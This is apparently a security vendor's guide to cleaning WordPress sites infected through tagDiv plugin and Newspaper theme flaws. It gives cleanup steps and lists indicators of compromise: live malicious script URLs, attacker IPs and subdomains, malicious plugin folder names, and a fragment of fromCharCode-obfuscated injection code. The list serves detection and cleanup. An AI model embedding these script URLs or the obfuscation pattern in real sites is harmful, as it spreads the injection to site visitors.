How to Clean getmygateway.com & playerofsunshine.com Malware

By Adrian StoianGuides

According to the PublicWWW engine, there are approx. 81513 sites using the Newspaper theme and tagDiv plugin – more than 4600 sites still show signs of contamination.

MAGEFIX SecurityMalware cleanup & protection

Try our Free site check.

How to clean a website affected by tagDiv and Newspaper vulnerabilities.

  1. Backup the infected site, including database and web files – keep everything, including any suspicious file.
  2. Restore core files, plugins and themes, one by one, manually, making sure you’ll not use any files from the backup – start fresh. You may restore wp-config.php after a quick check.
  3. Make sure the /uploads/ folder is malware-free, look for .php & .zip files.
  4. After you got back a working WordPress site, check the dashboard and remove any suspicious admin users.
  5. Backup and review the wp_options table, it should include obfuscated code. Find and remove any malicious injection.
  6. Ask for a reindex via Google search console.
  7. Apply all the security updates available and use PHP version 7.4 or greater.
  8. Use Search Replace DB ver. 4.1.3 to replace malicious code inside wp_options.
  9. Scan all the sites hosted on the same server for cross-site contamination. If other sites are affected, isolate them and repeat the cleanup process for each.

If you seek professional help with cleanup and security updates, check our Platinum plan.
https://members.magefix.com/product/platinum/

Malicious URLs:
https://where.selectofmychoices.com/scripts/step.js
https://gate.getmygateway.com/select
https://west.statisticplatform.com/stats
https://good.playerofsunshine.com/scripts/start.js
hxxps://good.playerofsunshine[.]com/scripts/post.js
https://normal.playerofsunshine.com/scripts/start.js
https://cdn.statisticscripts.com/stats/get.js
https://here.selectofmychoices.com/scripts/get.js
https://try.selectofmychoices.com/script/start.js
https://best.playerofsunshine.com/scripts/cdn.js
https://fourth.gybritanalytsesystem.com/scripts/start.js
https://fifth.gybritanalytsesystem.com/script/step.js
https://content.streamfastcdn.com

Malicious IPs: 185.39.206.161, 80.66.79[.](247|253) Hyper Hosting SRL

Malicious subdomains

80.66.79.250
store.bestselllerservice.com

80.66.79.251
follow.forwardstarlight.com
stay.forwardstarlight.com
west.statisticplatform.com

80.66.79.252
get.promsmotion.com
show.bridgelinering.com
net.promsmotion.com
go.bridgelinering.com

80.66.79.253
gate.getmygateway.com
get.lightsteper.com
cdn.specialtaskevents.com
page.specialnewspaper.com

80.66.79.249
special.beatifulllhistory.com

80.66.79.248
west.statisticplatform.com
goto.betradingway.com
give.selectchoise.com
north.statisticplatform.com
got.selectchoise.com
startup.betradingway.com

80.66.79.247
call.getsmallcount.com
get.statisticplatform.com
got.statisticplatform.com
come.statisticplatform.com
bee.selectofmychoices.com
best.playerofsunshine.com
fourth.gybritanalytsesystem.com
was.selectofmychoices.com
where.selectofmychoices.com
normal.playerofsunshine.com
good.playerofsunshine.com
try.selectofmychoices.com
great.playerofsunshine.com
third.gybritanalytsesystem.com
here.selectofmychoices.com
second.gybritanalytsesystem.com
fifth.gybritanalytsesystem.com
first.gybritanalytsesystem.com
excelent.playerofsunshine.com

fromCharCode obfuscated code inside tdw-css-placeholder:
[‘fr’+’om’+String.fromCharCode(67

Malicious files & plugin folders: zexit.zip, wp-zexit, wp-swamp.
wp-admin/js/custom-header.js, wp-includes/script-loader.js, wp-includes/js/wp-custom-header.js

Reddit

wp-zexit
byu/cdbessig inWordPress

SiteCheck Sucuri
Malware Found, Known javascript malware: malware.injection?35.54
Known malware: malware.injection?35.59

How this malware works:

Balada Injector Targets Unpatched tagDiv Plugin, Newspaper Theme & WordPress Admins

Twitter @500mk500

Decoded malware

Need help?

Try our Free site check.